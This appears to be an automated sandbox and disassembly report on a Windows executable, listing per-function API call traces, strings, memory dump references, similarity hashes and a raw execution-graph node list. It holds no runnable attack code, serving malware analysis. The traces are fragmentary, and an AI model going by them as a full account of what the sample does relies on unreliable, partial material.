                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,009F7F55,?,?,?), ref: 009F9FD0
                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,009F7F55,?,?), ref: 009FA014
                                                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,009F7F55,?,?,?,?,?,?,?,?), ref: 009FA095
                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,009F7F55,?,?,?,?,?,?,?,?,?,?,?), ref: 009FA09C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 2287278272-0
                                                                                                      • Opcode ID: 79561c296cdc6379453c2fec7c05118492abff3e77cbab7fd7a6b3c3a25661b4
                                                                                                      • Instruction ID: 947f75f5da24fac79dbcf660039e871e900f7b45760699a64ac28beafcb93a29
                                                                                                      • Opcode Fuzzy Hash: 79561c296cdc6379453c2fec7c05118492abff3e77cbab7fd7a6b3c3a25661b4
                                                                                                      • Instruction Fuzzy Hash: 8541DF71248389AEE731DF24DC45FBABBE8AF81700F08091CB6E5D31C1DA649A088753
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00A12794,00000000,00000000,00A12FC2,?,00A12FC2,?,00000001,00A12794,F5E85006,00000001,00A12FC2,00A12FC2), ref: 00A19440
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A194C9
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A194DB
                                                                                                      • __freea.LIBCMT ref: 00A194E4
                                                                                                        • Part of subcall function 00A159FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A123AA,?,0000015D,?,?,?,?,00A12F29,000000FF,00000000,?,?), ref: 00A15A2E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 2652629310-0
                                                                                                      • Opcode ID: 95f2cf39d7385d7dafd60896e95b57732ae005988d4e3236ebb9644808ccbc7a
                                                                                                      • Instruction ID: 2530514f5b4ae07b15d80e4e38b682419b847386acde7523355a58a87259bd18
                                                                                                      • Opcode Fuzzy Hash: 95f2cf39d7385d7dafd60896e95b57732ae005988d4e3236ebb9644808ccbc7a
                                                                                                      • Instruction Fuzzy Hash: 7331AE72A0020AABDB25DFA8DC55EEF7BA5EB40710F044228FC15DA191E735CD92CB90
                                                                                                      APIs
                                                                                                      • LoadBitmapW.USER32(00000065), ref: 00A09A86
                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A09AA7
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A09ACF
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A09AEE
                                                                                                        • Part of subcall function 00A08BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00A09AC8,00000066), ref: 00A08BE1
                                                                                                        • Part of subcall function 00A08BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00A09AC8,00000066), ref: 00A08BF9
                                                                                                        • Part of subcall function 00A08BD0: LoadResource.KERNEL32(00000000,?,?,00A09AC8,00000066), ref: 00A08C0C
                                                                                                        • Part of subcall function 00A08BD0: LockResource.KERNEL32(00000000,?,?,00A09AC8,00000066), ref: 00A08C17
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 142272564-0
                                                                                                      • Opcode ID: 4d05df2f62e747a2a287b93465b3e81d9d01b47ae4baf024b2dc9296cb7f6e5f
                                                                                                      • Instruction ID: f6d69b5ef714f7c874ee110819cecdba5998c342252d1fb457a850c70c3be555
                                                                                                      • Opcode Fuzzy Hash: 4d05df2f62e747a2a287b93465b3e81d9d01b47ae4baf024b2dc9296cb7f6e5f
                                                                                                      • Instruction Fuzzy Hash: 2801F73264161C37C621B7B8BE42EBFB66DDF85B91F090021FD41E72D2DE158C1381A5
                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00A11020
                                                                                                        • Part of subcall function 00A11658: ___AdjustPointer.LIBCMT ref: 00A116A2
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00A11037
                                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A11049
                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00A1106D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                      • String ID:
                                                                                                      • API String ID: 2633735394-0
                                                                                                      • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                      • Instruction ID: cb604ba6a5bf871a2e20cc72a03f0222706665ed9f2c2d0ecc776a6288ca08a1
                                                                                                      • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                      • Instruction Fuzzy Hash: 51012532800148FFCF229F55CD41EEA3BBAEF58754F058419FA1866120C376E9E1EBA0
                                                                                                      APIs
                                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A10B66
                                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A10B6B
                                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A10B70
                                                                                                        • Part of subcall function 00A11C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A11C1F
                                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A10B85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                      • String ID:
                                                                                                      • API String ID: 1761009282-0
                                                                                                      • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                      • Instruction ID: 4619b80794f3878f74f179b51b8a811ea43f58087429a525605490487fb43e79
                                                                                                      • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                      • Instruction Fuzzy Hash: E3C04C6815C654941C243BF427029EE27500C667D978011C6AAD1174535A8644CB64B6
                                                                                                      APIs
                                                                                                        • Part of subcall function 00A08BA5: GetDC.USER32(00000000), ref: 00A08BA9
                                                                                                        • Part of subcall function 00A08BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A08BB4
                                                                                                        • Part of subcall function 00A08BA5: ReleaseDC.USER32(00000000,00000000), ref: 00A08BBF
                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00A08D24
                                                                                                        • Part of subcall function 00A08EEA: GetDC.USER32(00000000), ref: 00A08EF3
                                                                                                        • Part of subcall function 00A08EEA: GetObjectW.GDI32(?,00000018,?), ref: 00A08F22
                                                                                                        • Part of subcall function 00A08EEA: ReleaseDC.USER32(00000000,?), ref: 00A08FB6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                                      • String ID: (
                                                                                                      • API String ID: 1061551593-3887548279
                                                                                                      • Opcode ID: e829fb7c4342c24e004ef43036b40e00f9b6c4684887e57c3c38c4a4fc46d72d
                                                                                                      • Instruction ID: 46f7fd2c32afc3bfe6c23996efb930d54f278301c1fe375fa688185c23db8740
                                                                                                      • Opcode Fuzzy Hash: e829fb7c4342c24e004ef43036b40e00f9b6c4684887e57c3c38c4a4fc46d72d
                                                                                                      • Instruction Fuzzy Hash: B4611771204315AFD210DF68D884E6BBBE9FF99704F10492DF599CB2A0DB35E806CB62
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _swprintf
                                                                                                      • String ID: %ls$%s: %s
                                                                                                      • API String ID: 589789837-2259941744
                                                                                                      • Opcode ID: 739fe4810c24a202e50d76e8592e854871242c9092acb6153bacbe29c9bb7402
                                                                                                      • Instruction ID: cc1a84c4c68f906bf94376b496f5b0fe01c277da177933a03724e42fd84ffd91
                                                                                                      • Opcode Fuzzy Hash: 739fe4810c24a202e50d76e8592e854871242c9092acb6153bacbe29c9bb7402
                                                                                                      • Instruction Fuzzy Hash: AA512F3168C30CFAEA211694BE4BF717675AB5EF00F20C41AF386A44E7C5E35850671B
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F761E
                                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F7799
                                                                                                        • Part of subcall function 009FA0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009F9EF9,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009FA0D7
                                                                                                        • Part of subcall function 009FA0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009F9EF9,?,?,?,009F9D92,?,00000001,00000000,?,?), ref: 009FA108
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$H_prologTime
                                                                                                      • String ID: :
                                                                                                      • API String ID: 1861295151-336475711
                                                                                                      • Opcode ID: 3a09ee0c3d00c3477d9225dbc91e1f82d51cc64ba5dc8a5ad1a3bc823c15d03e
                                                                                                      • Instruction ID: 04e0d87b89a6e1275303d6ec6c104e99dc8a8d054e40b22e617ac1add4783d53
                                                                                                      • Opcode Fuzzy Hash: 3a09ee0c3d00c3477d9225dbc91e1f82d51cc64ba5dc8a5ad1a3bc823c15d03e
                                                                                                      • Instruction Fuzzy Hash: 9241C07180865CAADB24EBA4DC55FFEB37CEF85300F0040A9B745A2092DB749F85CBA1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: UNC$\\?\
                                                                                                      • API String ID: 0-253988292
                                                                                                      • Opcode ID: 83caadbc3a4aaf655ed16a305becba3ce297a9e1f2459d1704e3935468301c4c
                                                                                                      • Instruction ID: bdc9bd0fc31f326fc8c97b543141736fbd38742b01b142ab7048dc804d8b6943
                                                                                                      • Opcode Fuzzy Hash: 83caadbc3a4aaf655ed16a305becba3ce297a9e1f2459d1704e3935468301c4c
                                                                                                      • Instruction Fuzzy Hash: 5E419B3558521DBACB21AF21DC41EFF77ADEF44390B108526FA54A3146EBB0DA90CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Shell.Explorer$about:blank
                                                                                                      • API String ID: 0-874089819
                                                                                                      • Opcode ID: bac52607503c9c5c264329840a0035bb326b1395091df58b59d513ea1d4ad6a4
                                                                                                      • Instruction ID: 9faaa4fc6d0761fb5d4b8a0e6435ad0a9ed6961b02225210b46c4813a8fbf12a
                                                                                                      • Opcode Fuzzy Hash: bac52607503c9c5c264329840a0035bb326b1395091df58b59d513ea1d4ad6a4
                                                                                                      • Instruction Fuzzy Hash: C721CD7570061AAFD3049F74E8A0E2AB768BF84710B14C62DF1458B2C2CF79EC54CBA4
                                                                                                      APIs
                                                                                                        • Part of subcall function 009FDEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FDED4
                                                                                                        • Part of subcall function 009FDEB5: GetProcAddress.KERNEL32(00A31E58,CryptUnprotectMemory), ref: 009FDEE4
                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,009FDF2E), ref: 009FDFB5
                                                                                                      Strings
                                                                                                      • CryptUnprotectMemory failed, xrefs: 009FDFAD
                                                                                                      • CryptProtectMemory failed, xrefs: 009FDF75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                      • API String ID: 2190909847-396321323
                                                                                                      • Opcode ID: d114cbff281ff53d9cc02509556de275f2f65cbdda6e822218877a555b27cc63
                                                                                                      • Instruction ID: 88effa8b4ad1d2b8e9e2b49fee9f6cdaf5f6576c0280bb7e4f2f9d9795e00821
                                                                                                      • Opcode Fuzzy Hash: d114cbff281ff53d9cc02509556de275f2f65cbdda6e822218877a555b27cc63
                                                                                                      • Instruction Fuzzy Hash: A911367131A21E6BEB119B79DC01F7E779FAFC4B24B144029FA02DA1D2DBA0ED018390
                                                                                                      APIs
                                                                                                        • Part of subcall function 009FCED7: GetWindowRect.USER32(?,?), ref: 009FCF0E
                                                                                                        • Part of subcall function 009FCED7: GetClientRect.USER32(?,?), ref: 009FCF1A
                                                                                                        • Part of subcall function 009FCED7: GetWindowLongW.USER32(?,000000F0), ref: 009FCFBB
                                                                                                        • Part of subcall function 009FCED7: GetWindowRect.USER32(?,?), ref: 009FCFE8
                                                                                                        • Part of subcall function 009FCED7: GetWindowTextW.USER32(?,?,00000400), ref: 009FD007
                                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                      • SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Text$ClientItemLong
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 660763476-4108050209
                                                                                                      • Opcode ID: b11edefb53005f0b03e96e261ec21fdd5d0e55bd3009f0ac9cf124f054ae8117
                                                                                                      • Instruction ID: 3242f577161f09ebeaedb0809080ed2e237351c7df2c76fd28d6931a12383ba3
                                                                                                      • Opcode Fuzzy Hash: b11edefb53005f0b03e96e261ec21fdd5d0e55bd3009f0ac9cf124f054ae8117
                                                                                                      • Instruction Fuzzy Hash: 2EF0C2B054025DEBDF260FA49D09BF93B5DAF14745F088024FF44544A1C7B8CC92EB94
                                                                                                      APIs
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,009FFD0B,?,?,009FFD80,?,?,?,?,?,009FFD6A), ref: 009FFACD
                                                                                                      • GetLastError.KERNEL32(?,?,009FFD80,?,?,?,?,?,009FFD6A), ref: 009FFAD9
                                                                                                        • Part of subcall function 009F6DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F6DF1
                                                                                                      Strings
                                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009FFAE2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                      • API String ID: 1091760877-2248577382
                                                                                                      • Opcode ID: 5e548df519517105ee1f87706df887b7f5fe478fc54c94a5d44f373a7f92bbfe
                                                                                                      • Instruction ID: 3160d1cc655478f802dfa181ace95cad5b5e3051a8dc4df410e88a39eff94a55
                                                                                                      • Opcode Fuzzy Hash: 5e548df519517105ee1f87706df887b7f5fe478fc54c94a5d44f373a7f92bbfe
                                                                                                      • Instruction Fuzzy Hash: 8DD05E7164C53537EA11736C6C0AF7E7919AF52730F640735F63AA55E6CA200C534391

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:5.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:14.8%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:116
                                                                                                      execution_graph 91426 11108d30 91469 1110f420 91426->91469 91429 11108da9 OpenEventA 91432 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 91429->91432 91433 11108e18 CloseHandle GetSystemDirectoryA 91429->91433 91434 1110f420 std::_Mutex::_Mutex 265 API calls 91432->91434 91435 11108e38 91433->91435 91436 11108f23 91434->91436 91435->91435 91437 11108e40 LoadLibraryA 91435->91437 91438 11108f3c 91436->91438 91546 110f4680 268 API calls std::_Mutex::_Mutex 91436->91546 91437->91432 91439 11108e71 91437->91439 91497 1110f2b0 91438->91497 91513 111450a0 91439->91513 91442 11108e7b 91444 11108e82 GetProcAddress 91442->91444 91445 11108e9a GetProcAddress 91442->91445 91444->91445 91447 11108ec4 FreeLibrary 91445->91447 91448 11108eb6 91445->91448 91447->91432 91448->91432 91451 11109005 91549 11161d01 91451->91549 91452 1110f420 std::_Mutex::_Mutex 265 API calls 91454 11108f73 91452->91454 91456 11108f84 91454->91456 91457 11108f8d 91454->91457 91455 1110901f 91547 110f4680 268 API calls std::_Mutex::_Mutex 91456->91547 91459 1110f2b0 425 API calls 91457->91459 91460 11108fa9 CloseHandle 91459->91460 91461 111450a0 std::_Mutex::_Mutex 90 API calls 91460->91461 91462 11108fba 91461->91462 91462->91451 91463 1110f420 std::_Mutex::_Mutex 265 API calls 91462->91463 91464 11108fc8 91463->91464 91465 11108fe2 91464->91465 91548 110f4680 268 API calls std::_Mutex::_Mutex 91464->91548 91467 1110f2b0 425 API calls 91465->91467 91468 11108ffe CloseHandle 91467->91468 91468->91451 91557 11162b51 91469->91557 91472 1110f447 wsprintfA 91574 11029450 265 API calls 2 library calls 91472->91574 91475 1110f473 _memset 91476 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91475->91476 91477 11108d91 91476->91477 91477->91429 91478 11107290 91477->91478 91583 1110f520 91478->91583 91481 1110f520 3 API calls 91482 111072dc 91481->91482 91483 1110f520 3 API calls 91482->91483 91484 111072ee 91483->91484 91485 1110f520 3 API calls 91484->91485 91486 111072ff 91485->91486 91487 1110f520 3 API calls 91486->91487 91488 11107310 91487->91488 91489 1110f420 std::_Mutex::_Mutex 265 API calls 91488->91489 91490 11107321 91489->91490 91491 1110740a 91490->91491 91492 1110732c LoadLibraryA LoadLibraryA 91490->91492 91590 1116219a 66 API calls std::exception::_Copy_str 91491->91590 91492->91429 91494 11107419 91591 111625f1 RaiseException 91494->91591 91496 1110742e 91498 1110f2d0 CreateThread 91497->91498 91499 1110f2bf CreateEventA 91497->91499 91501 1110f2f6 91498->91501 91502 1110f30d 91498->91502 91595 11102c50 91498->91595 91617 1110fde0 91498->91617 91631 11027270 91498->91631 91656 1102c410 91498->91656 91499->91498 91594 11029450 265 API calls 2 library calls 91501->91594 91504 1110f311 WaitForSingleObject CloseHandle 